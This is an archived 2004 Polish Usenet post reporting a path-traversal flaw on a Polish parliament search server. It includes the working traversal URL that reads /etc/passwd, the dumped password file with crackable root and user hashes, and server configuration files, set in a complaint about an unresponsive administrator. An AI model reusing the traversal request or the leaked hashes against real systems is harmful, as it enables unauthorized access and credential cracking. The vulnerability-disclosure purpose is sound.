-
1. Data: 2004-08-14 18:05:27
Temat: Dziurawy serwer sejm.gov.pl
Od: zYm3N <z...@i...pl>
Witam !
Jakiś czas temu - 2004-06-07 - na grupie dyskusyjnej alt.pl.comp.os.hacking
powiadomiłem użytkowników usenetu o znalezionej przeze mnie dziurze w
serwerach sejmu. Sprawa jednak przycichła, a sama dziura jak byla, nadal
istnieje. Nie wiem do kogo zwrócić się z *prośbą* o załatanie tego buga, bo
administrator jak widać ma to najwyraźniej w *głębokim poważaniu*. Nie chcę
robić z tego aferty medialnej, ale jeśli nie będzie żadnej reakcji ze
strony administratora serwera - a aktualnie jest ona przynajmniej śmieszna
- napiszę do jednej czy drugiej gazety...
Poniżej zamieszczam posta z w/w dnia. Może ktoś z was wie, co z tym zrobić?
Do kogo napisać?
"
Witam !
w zwiazku z bardzo interesujaca odpowiedzia administratora serwera
pozwalam sobie opublikowac ponizej informacje na temat serwera. Moze to
sprawi, ze nastapi jakas zmiana stanu rzeczy...
Kawalek mojego maila:
"A wiec tak...
/etc/passwd
root:Gsk4Riel5Z1Xg:0:3::/home/pms/:/sbin/sh
daemon:*:1:5::/:/sbin/sh
bin:*:2:2::/usr/bin:/sbin/sh
sys:*:3:3::/:
adm:*:4:4::/var/adm:/sbin/sh
uucp:*:5:3::/var/spool/uucppublic:/usr/lbin/uucp/uuc
ico
lp:*:9:7::/var/spool/lp:/sbin/sh
nuucp:*:11:11::/var/spool/uucppublic:/usr/lbin/uucp/
uucico
hpdb:*:27:1:ALLBASE:/:/sbin/sh
www:*:30:1::/:
smbnull:*:101:101:DO NOT USE OR DELETE - needed by
Samba:/home/smbnull:/sbin/sh
guest::102:20:,,,:/home/guest:/usr/bin/csh
ftp:*:500:1:Anonymous FTP user:/home/ftp:/usr/bin/false
pms:Y/OxnABlzNdCw:103:20:,,,:/home/pms:/usr/bin/sh
media:fACvWeGdgWi3E:105:20:,,,:/home/media:/usr/bin/
sh
topicdba:bkkpsiyw0HayM:106:102:,,,:/topic/home/topic
dba:/usr/bin/csh
topicuse:xpxzO3/0Kj.FE:107:102:,,,:/topic/home/topic
use:/usr/bin/sh
topicdat:YpKheZ9AW224s:104:102:,,,:/topic/home/topic
dat:/usr/bin/csh
wisia:ZjRzFicDUS3g6:108:20::/home/wisia:/sbin/sh
/etc/issue
GenericSysName [HP Release B.11.00] (see /etc/issue)
/etc/inetd.conf
## Configured using SAM by root on Mon Oct 15 09:18:47 2001
##
#
# @(#)inetd.conf $Revision: 1.24.214.3 $ $Date: 97/09/10 14:50:49 $
#
# Inetd reads its configuration information from this file upon execution
# and at some later time if it is reconfigured.
#
# A line in the configuration file has the following fields separated by
# tabs and/or spaces:
#
# service name as in /etc/services
# socket type either "stream" or "dgram"
# protocol as in /etc/protocols
# wait/nowait only applies to datagram sockets, stream
# sockets should specify nowait
# user name of user as whom the server should run
# server program absolute pathname for the server inetd
will # execute
# server program args. arguments server program uses as they
normally
# are starting with argv[0] which is the
name of
# the server.
#
# See the inetd.conf(4) manual page for more information.
##
##
#
# ARPA/Berkeley services
#
##
ftp stream tcp nowait root /usr/lbin/ftpd ftpd -l
telnet stream tcp nowait root /usr/lbin/telnetd telnetd
# Before uncommenting the "tftp" entry below, please make sure
# that you have a "tftp" user in /etc/passwd. If you don't
# have one, please consult the tftpd(1M) manual entry for
# information about setting up this service.
tftp dgram udp wait root /usr/lbin/tftpd tftpd\
/opt/ignite\
/var/opt/ignite
#bootps dgram udp wait root /usr/lbin/bootpd bootpd
#finger stream tcp nowait bin /usr/lbin/fingerd fingerd
login stream tcp nowait root /usr/lbin/rlogind rlogind
shell stream tcp nowait root /usr/lbin/remshd remshd
exec stream tcp nowait root /usr/lbin/rexecd rexecd
#uucp stream tcp nowait root /usr/sbin/uucpd uucpd
ntalk dgram udp wait root /usr/lbin/ntalkd ntalkd
ident stream tcp wait bin /usr/lbin/identd identd
##
#
# Other HP-UX network services
#
##
printer stream tcp nowait root /usr/sbin/rlpdaemon rlpdaemon -i
##
#
# inetd internal services
#
##
daytime stream tcp nowait root internal
daytime dgram udp nowait root internal
time stream tcp nowait root internal
#time dgram udp nowait root internal
echo stream tcp nowait root internal
echo dgram udp nowait root internal
discard stream tcp nowait root internal
discard dgram udp nowait root internal
chargen stream tcp nowait root internal
chargen dgram udp nowait root internal
##
#
# rpc services, registered by inetd with portmap
# Do not uncomment these unless your system is running portmap!
#
##
# WARNING: The rpc.mountd should now be started from a startup script.
# Please enable the mountd startup script to start rpc.mountd.
##
#rpc stream tcp nowait root /usr/sbin/rpc.rexd 100017 1
rpc.rexd
#rpc dgram udp wait root /usr/lib/netsvc/rstat/rpc.rstatd
100001 2-4 rpc.rstatd
#rpc dgram udp wait root /usr/lib/netsvc/rusers/rpc.rusersd
100002 1-2 rpc.rusersd
#rpc dgram udp wait root /usr/lib/netsvc/rwall/rpc.rwalld
100008 1 rpc.rwalld
#rpc dgram udp wait root /usr/sbin/rpc.rquotad 100011 1
rpc.rquotad
#rpc dgram udp wait root /usr/lib/netsvc/spray/rpc.sprayd
100012 1 rpc.sprayd
##
#
# The standard remshd and rlogind do not include the Kerberized
# code. You must install the InternetSvcSec/INETSVCS-SEC fileset and
# configure Kerberos as described in the SIS(5) man page.
#
##
kshell stream tcp nowait root /usr/lbin/remshd remshd -K
klogin stream tcp nowait root /usr/lbin/rlogind rlogind -K
##
#
# NCPM programs.
# Do not uncomment these unless you are using NCPM.
#
##
#ncpm-pm dgram udp wait root /opt/ncpm/bin/ncpmd ncpmd
#ncpm-hip dgram udp wait root /opt/ncpm/bin/hipd hipd
dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd
rpc xti tcp swait root /usr/dt/bin/rpc.ttdbserver 100083 1
/usr/dt/bin/rpc.ttdbserver
rpc dgram udp wait root /usr/dt/bin/rpc.cmsd 100068 2-5 rpc.cmsd
recserv stream tcp nowait root /usr/lbin/recserv recserv -display :0
swat stream tcp nowait.400 root /opt/samba/bin/swat swat
registrar stream tcp nowait root /etc/opt/resmon/lbin/registrar
/etc/opt/resmon/lbin/registrar
/etc/fstab
/dev/vg00/lvol3 / vxfs delaylog 0 1
/dev/vg00/lvol1 /stand hfs defaults 0 1
/dev/vg00/lvol4 /tmp vxfs delaylog 0 2
/dev/vg00/lvol6 /opt vxfs delaylog 0 2
/dev/vg00/lvol7 /usr vxfs delaylog 0 2
/dev/vg00/lvol8 /var vxfs delaylog 0 2
/dev/vg00/lvol5 /topic vxfs rw,suid,nolargefiles,delaylog,datainlog 0 2
instl_boots dgram udp wait root /opt/ignite/lbin/instl_bootd instl_bootd
mpokul:It1kgwtctdHjI:109:20:,,,:/home/mpokul:/usr/bi
n/sh
............
moge reszty nie pokazywac ? Nie chce mi sie/nie mam czasu/nie chce zeby
to bylo traktowane, jak proba wlamu.
Po prostu chce pokazac, ze nie mowie nieprawdy.
Blad tkwi tutaj:
http://ks.sejm.gov.pl:8009/search97cgi/vtopic?Result
Template=../../../../../../../../../../../../../../.
./../etc/passwd&QueryText=ID+%3Ccontains%3E+207&acti
on=Search&Collection=iz4p%2Dop&SortSpec=NUMER+Asc&Re
sultStart=1&ResultCount=25&ServerKey=Sejm&Nazwa=Andr
zej+Lepper&Plec=M
Ktos z tworcow skryptu nawalil.. i to nawalil porzadnie....."
Odpowiedz administratora:
"Mysle ze jednak jeszcze daleko do przejecia kontroli. Wiem ze jest stary
Apache ale tak musi zostac. Przynajmniej mozna epatwoac mozliwoscia
bejrzenia
/etc/passwd i paru innych. Dziekuje za zainteresowanie. Byc moze kiedys uda
sie zmienic wersje co nie jest proste ze wzgldu na licencje zwiazane z
Verity.
Zwykle odzywaja sie problemy z zakupem nowych wersji i tak musi poki co
pozostac. "
skoro to jest dalekie od przejecia kontroli, to mysle, ze nikomu nie
zaszkodzi opublikowanie tych informacji.
Zycze milego wieczorka.
pozdrawiam.
zYm3N
"
link do posta: http://tinyurl.com/6lulq
ps. Wie ktoś może jak jest z ujawnianiem korespondencji prywatnej ? Nie
chcę być posądzony o łamanie prawa.. Jeśli dostanę linki do § Polskiego
Prawa, to umieszczę tutaj te kilka maili administratora sejm.gov.pl.
--
zYm3N[@interia.pl]
.:: C++ | C | PHP | HTML | Delphi | Pascal
.:: >> http://zymen.net <<
.:: http://zymen.net/cytowanie.htm
do góry
Dom Development rusza z inwestycją Mokotów Sportowy
